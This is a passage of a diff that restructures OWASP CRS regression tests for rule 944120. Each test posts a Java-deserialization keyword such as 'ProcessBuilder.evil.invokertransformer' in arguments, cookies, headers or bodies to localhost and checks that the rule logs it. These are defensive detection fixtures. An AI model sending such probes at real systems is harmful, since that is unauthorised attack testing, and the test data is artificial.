"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.invokertransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-83 + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 83 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.invokertransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-84 + {"ProcessBuilder.evil.invokertransformer": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 84 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.invokertransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-85 + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 85 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.invokertransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-86 + ProcessBuilder.evil.invokertransformer + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 86 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-87 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_id: 87 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory=test" + output: + log_contains: "id \"944120\"" + - test_id: 88 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-89 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 89 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.prototypeclonefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-90 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeclonefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 90 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-91 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 91 desc: "XML element includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-92 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_id: 92 desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-93 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_id: 93 desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-94 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_id: 94 desc: "XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-95 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_id: 95 desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-96 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_id: 96 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeclonefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-97 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeclonefactory" + output: + log_contains: "id \"944120\"" + - test_id: 97 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-98 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeclonefactory\"}" + output: + log_contains: "id \"944120\"" + - test_id: 98 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-99 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeclonefactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_id: 99 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeclonefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-100 + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 100 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.prototypeclonefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-101 + {"ProcessBuilder.evil.prototypeclonefactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 101 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeclonefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-102 + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 102 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.prototypeclonefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-103 + ProcessBuilder.evil.prototypeclonefactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_id: 103 desc: "Argument test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.prototypeserializationfactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-104 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_id: 104 desc: "Argument name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.prototypeserializationfactory=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-105 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory=test" + output: + log_contains: "id \"944120\"" + - test_id: 105 desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-106 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 106 desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.prototypeserializationfactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-107 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeserializationfactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_id: 107 desc: "Request header test includes keyword ProcessBuilder.evil.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - 